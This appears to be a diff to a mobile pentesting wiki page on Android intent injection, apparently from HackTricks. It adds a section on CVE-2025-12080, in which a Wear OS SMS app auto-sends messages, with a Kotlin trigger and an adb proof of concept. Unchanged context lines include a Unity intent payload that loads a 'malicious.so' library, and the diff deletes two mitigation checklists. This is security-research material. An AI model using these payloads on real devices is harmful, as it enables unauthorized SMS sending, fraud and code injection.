CVE-2025-12080 — Wear OS Google Messages ACTION_SENDTO Auto‑...

src/mobile-pentesting/android-app-pentesting/intent-injection.md

@@ -48,10 +48,6 @@ What to look for in decompiled code:
 - Calls to `getSettings().setJavaScriptEnabled(true)` before the last host/path allowlist check.
 - A pipeline like: parse → partial validate → configure WebView → final verify → loadUrl.
 
-Mitigations
-- Canonicalize once and validate strictly; fail closed.
-- Only enable JavaScript after all checks pass and just before loading trusted content.
-- Avoid exposing bridges to untrusted origins.
 
 ## Unity Runtime: Intent-to-CLI extras → pre-init native library injection (RCE)
 
@@ -102,7 +98,7 @@ intent:#Intent;package=com.example.unitygame;scheme=whatever;\
 S.unity=-xrsdk-pre-init-library%20/data/local/tmp/malicious.so;end;
 ```
 However, on modern Android the dynamic linker namespaces and SELinux block loading from many public paths (e.g., `/sdcard/Download`). You’ll see errors like:
-```
+```text
 library "/sdcard/Download/libtest.so" ("/storage/emulated/0/Download/libtest.so") needed
 or dlopened by "/data/app/.../lib/arm64/libunity.so" is not accessible for the
 namespace: [name="clns-...", ... permitted_paths="/data:/mnt/expand:/data/data/com.example.unitygame"]
@@ -167,7 +163,9 @@ Full-pipeline automation (interactive executor)
 python apk-components-inspector.py app.apk | tee adbcommands.txt
 python run_adb_commands.py
 ```
-Helper script (merges continued lines, executes only lines starting with `adb`):
+<details>
+<summary>Helper script (merges continued lines, executes only lines starting with adb)</summary>
+
 ```python
 import subprocess
 
@@ -203,6 +201,8 @@ for i, cmd in enumerate(parse_adb_commands('adbcommands.txt'), 1):
     except subprocess.CalledProcessError as e:
         print(f"Command failed with error:\n{e.stderr}")
 ```
+
+</details>
 Run on-device: the inspector is Python-based and works in Termux or rooted phones where `apktool`/`androguard` are available.
 
 ---
@@ -250,11 +250,45 @@ Real-world examples (impact varies):
 - CVE-2021-4438 (React Native SMS User Consent).
 - CVE-2020-14116 (Xiaomi Mi Browser).
 
-Mitigations (developer checklist)
-- Do not forward incoming Intents directly; sanitize and re-construct allowed fields.
-- Restrict exposure with `android:exported="false"` unless necessary. Protect exported components with permissions and signatures.
-- Verify caller identity (`getCallingPackage()`/`getCallingActivity()`), and enforce explicit Intents for intra-app navigation.
-- Validate both `action` and `data` (scheme/host/path) before use; avoid `Intent.parseUri` on untrusted input.
+
+---
+
+## Abusing ACTION_SENDTO sms/smsto/mms/mmsto against default SMS handlers (Wear OS auto-send)
+
+Abuse pattern
+- On Android (incl. Wear OS), an implicit `Intent.ACTION_SENDTO` with a data URI `sms:`, `smsto:`, `mms:`, or `mmsto:` is routed to the system’s default SMS/MMS/RCS app.
+- Secure behavior: the target opens a composer UI and requires explicit user confirmation.
+- Vulnerable behavior: the target auto-sends immediately when invoked via inter-app `startActivity(...)`, so the caller needs no `SEND_SMS` or privileged permissions.
+
+Minimal trigger (Kotlin)
+```kotlin
+val i = Intent(Intent.ACTION_SENDTO, Uri.parse("smsto:+15551234567"))
+i.putExtra("sms_body", "hello from watch")
+startActivity(i)
+```
+
+ADB PoC
+```bash
+adb shell am start -a android.intent.action.SENDTO \
+  -d "smsto:+15551234567" --es sms_body "hello from watch"
+```
+
+Notes and variants
+- The following also resolve to the default handler: `sms:+15551234567`, `mms:+15551234567`, `mmsto:+15551234567`.
+- Extras commonly honored: `sms_body` (message body). Some handlers also accept `subject` for MMS.
+- Because Intents are inter-app IPC, the caller app does NOT need the `android.permission.SEND_SMS` permission.
+- On Wear OS, Tiles/Complications that can launch Activities can fire the same `SENDTO` to achieve silent dispatch if the handler mis-implements the compose flow.
+
+Impact
+- Silent, unauthorized SMS/MMS/RCS transmission from the victim device (spam, premium-SMS fraud, OTP/social engineering, privacy leakage).
+
+Hunting tips
+- Ensure the target app is set as the default SMS app, then trigger the PoC. If a compose UI is shown, behavior is correct; if a message is sent without UI, it’s vulnerable.
+- Test all four schemes (`sms:`, `smsto:`, `mms:`, `mmsto:`) and with/without `sms_body`.
+- Observe device UI/logcat for immediate send events when the Activity is launched from a third-party app.
+
+Example affected class of apps
+- Default SMS handlers (e.g., Messages variants) on Wear OS builds that mis-handle `ACTION_SENDTO` by taking an auto-send path instead of guarded UI.
 
 ---
 
@@ -280,5 +314,6 @@ Mitigations (developer checklist)
 - [Unity docs – Android custom activity command-line](https://docs.unity3d.com/6000.0/Documentation/Manual/android-custom-activity-command-line.html)
 - [Unity Security Sept-2025-01 advisory](https://unity.com/security/sept-2025-01)
 - [HEXACON talk – Messenger one-click cache-based RCE pattern (slides)](https://www.hexacon.fr/slides/Calvanno-Defense_through_Offense_Building_a_1-click_Exploit_Targeting_Messenger_for_Android.pdf)
+- [CVE-2025-12080 – Wear OS Google Messages ACTION_SENDTO auto-send (PoC and details)](https://github.com/io-no/CVE-Reports/tree/main/CVE-2025-12080)
 
-{{#include ../../banners/hacktricks-training.md}}
+{{#include ../../banners/hacktricks-training.md}}